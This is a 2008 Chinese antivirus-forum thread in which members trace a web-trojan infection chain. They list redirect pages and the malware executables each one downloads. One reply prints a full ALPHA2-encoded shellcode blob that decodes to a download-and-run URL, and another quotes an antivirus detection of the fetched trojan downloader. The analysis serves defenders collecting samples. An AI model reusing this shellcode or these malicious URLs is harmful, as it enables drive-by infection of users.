阿米来入库

显示全部楼层 · 发表于 2008-2-16 01:10:39

原帖见：http://bbs.kafan.cn/viewthread.php?tid=203821&;extra=page%3D1
我靠，这东西真是累，看了下有人用freshow解的，漏了几个，给出个比较完善的结果

http://88.881215.com/88.htm
   http://88.881215.com/in.htm
            http://niu.xinniankl.com/web/6619038.htm
                  http://niu.xinniankl.com/web/htm.html
                        http://niu.xinniankl.com/web/rl.htm  --->http://exe.xinniankl.com/rl.exe
                        http://niu.xinniankl.com/web/1.js --->http://exe.xinniankl.com/014.exe
                        http://niu.xinniankl.com/web/bf.js --->http://exe.xinniankl.com/bf.exe
                        http://niu.xinniankl.com/web/pps.js  --->http://exe.xinniankl.com/pps.exe
                        http://exe.xinniankl.com/ad.cab
                        http://niu.xinniankl.com/web/3.htm http://exe.xinniankl.com/lz.exe
   http://sf.070808.net/s.htm
            http://ad.jopenqb.com/feng.htm
                  http://ad.jopenqb.com/wm/g15.htm  --->http://ccc.969222.com/bak.css
                  http://ad.jopenqb.com/wm/dm.htm
                        http://ad.jopenqb.com/wm/re.htm       --->alpha2的变形？那么长，解出来没网址
                        http://ad.jopenqb.com/wm/11.js
                                 http://ad.jopenqb.com/wm/g14.htm  --->http://ccc.969222.com/bak.css
                        http://ad.jopenqb.com/wm/storm.htm    --->http://down.hao365.org/bak.css
                        http://ad.jopenqb.com/wm/wo.htm       --->http://down.hao365.org/bak.css
   http://ga.mm5208.com/g.htm
            http://086196.service-google.cn/vip/Cn51903.htm
                  http://086196.service-google.cn/vip/wm2/z.html
                        hxxp://086196.service-google.cn/vip/wm2/1.gif --->http://20080203.service-google.cn/bf.exe
                        hxxp://086196.service-google.cn/vip/wm2/2.gif --->http://20080203.service-google.cn/614.exe
                        hxxp://086196.service-google.cn/vip/wm2/3.gif --->http://20080203.service-google.cn/qvod.exe
                        hxxp://086196.service-google.cn/vip/wm2/4.gif --->http://20080203.service-google.cn/baidu.cab
                        hxxp://086196.service-google.cn/vip/wm2/5.gif --->http://20080203.service-google.cn/pps.exe
                        hxxp://086196.service-google.cn/vip/wm2/11.gif  --->http://20080203.service-google.cn/lz3.exe
                        hxxp://086196.service-google.cn/vip/wm2/12.gif  --->http://20080209.service-google.cn/lz3.css
   http://dv.55189.net/
            http://ppp.buyaoni.com/ww/new82.htm
                  http://ppp.buyaoni.com/dm/diao.htm
                        http://ppp.buyaoni.com/dm/11.js  --->http://dd.749571.com/bb/014.exe
                        http://ppp.buyaoni.com/dm/bb.js  --->http://dd.749571.com/bb/bb.exe
                        http://ppp.buyaoni.com/dm/pp.js  --->http://dd.749571.com/bb/pp.exe
                  http://ppp.buyaoni.com/dm/rl.htm       --->http://dd.749571.com/bb/newrl.exe
                  http://ppp.buyaoni.com/dm/rr.htm       --->http://is.749571.com/bb/a.exe
   http://cmm.jqxx.org/c.htm --->该页无法显示
   http://a1.sbb22.com/a.htm
            http://xxx.huilaiba.info/dgll2.htm?2
                  http://xxx.huilaiba.info/ceshi/real.htm       --->http://xxx.wofala.info/ww/la.exe
                  http://xxx.huilaiba.info/ceshi/lz.htm
                        http://xxx.huilaiba.info/ceshi/lz1.htm  --->http://xxx.wofala.info/ww/la.exe
                  http://xxx.huilaiba.info/ceshi/614.htm       --->http://xxx.wofala.info/ww/la.exe
                  http://s53.cnzz.com/stat.php?id=717858&;web_id=717858&show=pic2  --->该页无法显示

[ 本帖最后由 qianwenxiang 于 2008-2-16 21:47 编辑 ]

显示全部楼层 · 发表于 2008-2-16 01:11:38

忘记说，http://ad.jopenqb.com/wm/re.htm，这个确定是alpha2加密的吧，但是怎么那么长？难道那个xor的密匙变了？阿米快行动

显示全部楼层 · 发表于 2008-2-16 01:13:07

一进来就

[ 本帖最后由 kato9096 于 2008-2-16 01:19 编辑 ]

显示全部楼层 · 发表于 2008-2-16 01:57:21

没错是ALPHA2 加密
只不过网页作者重复加密了几次罢了
shellcode是：

TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIqpZKtPQKPKUczi3Vx9LQS2k04tvkKNKRKJXkGuJHXkIoYokOeGJo9lynkNoQz4JnmwmJPuKOQemnL2PuNn9rCc2ULVxvpu7yLTHyNGR6vOKOKNKNglgwONqnxFWMNkWtd7NXKjJ6z1LPYnKNJ6LKlLLRj3NJNt9oOWpuKHTVE9YoinKNPkTVruKOKNKNsCQPo9kOYnKNLiLV7qKNynkNgqMxzZ9m6YuiKNmrmPopxPGIMnXzmKLFokKNi9GqmxJV8M7ULmNMlirSnXyVNNnMGqoXyrntMBZ6npLJmJLROZntiomw2UJX26NNkOinKNQewfImONhBPuNVKRt5MVJrImuSNzT58khNynKNkNpuPlaF9nkNKNnvfoOCkktkZ6FonSYKTkNvUgNLMpNM5QkzQz41LxJv6YnXZroCsOXNhoMF1VXL9nynJ6cvXNYnynlVpFxWinInPuYjrJonoIkwkINj9leL5WrWMPJnMOJ6QVYqKOKNlVPFXk9oInofw6vnkNKNt5xzSZLyHGl9lJIlELtG47ophJz4KNZ6okObZmhLofNumKLLnpoZodKOoWsEZXWf5gYnKNinbUuvkMoNKr1munyvPuOvofKMS5CMK1zNkNozLK2UNQYbymEesOkwz0njLZMBnkMMpuKaKMWeSMmSYninmZoWsEoKynRSmjm6KL8MP7hqQPXnyTWXOzzV7OP7L9ImdtmnVu6oyUx0xVNkKTOnN5n1ymNqhnnNLjJ4IjntxzNKuQOXKVNF5QlHznBQOKInOoDUKSkuNPn2LKm6MNhU8QkMlQXnnNOZJ49jNtKJnKvaLhhfLffamXZjPqoKkNMOsMUkzZweQO3MfYIzgecK0umP9zmzodkJNtnanIuQOX9vvYiilVzVKDKN8MWN46x9XzaegrOdxly7RuGl7snxUiOJJzXBkOKOPu32d3Ly8nOYNNNOloNOnOLonOlo2ST8O9KOKNKNLn5Qy8ZRwqMxZNQelhyJOOMuNLymuOymeOKMWoKMGoSMgbjZmtnMT5Etwlc9nLfaeNNOOX0ulK8BpulJZpMVImdKI8PumXYNkMDKXMTwMgOOQCkM7KHMteJQspjNO47XNjl6uoP5Yi9m14mnVutOyUYqLKvyY04590KjkMUsLX0uxrMe1eOPxbKM5s1e8zpuKMGKF5MpmwEm4VfTfcgqS1ZlozpoJRkwwlOsqmk7yWWhsVvWCrShZ5mMRWvOnQtNlvOuYSm0cjLZ4QsNQ8PQQtnSqoZnZOKNkNKNYnynKNynynKNKN9nYnkNynkNkNkNkNkNInlVnjLJLNktkaN1oyniMYHPMGnnjkKvHNn0omoaj3ZqLZNqMYJ0n0OkNfmKynA

复制代码

FreShow1.5可以解密解出来是 http://www.ip580.com/down.exe

显示全部楼层 · 发表于 2008-2-16 09:34:35

微点全杀

显示全部楼层 · 发表于 2008-2-16 21:31:41

还是些老毒物。

显示全部楼层 · 发表于 2008-2-16 21:38:26

detected: Trojan program Trojan-Downloader.Win32.Small.hsh File: C:\Virus\down.exe//PE_Patch.UPX//UPX

显示全部楼层 · 发表于 2008-2-17 15:39:04

你就不会弄一个包啊~~~

[已鉴定] 阿米来入库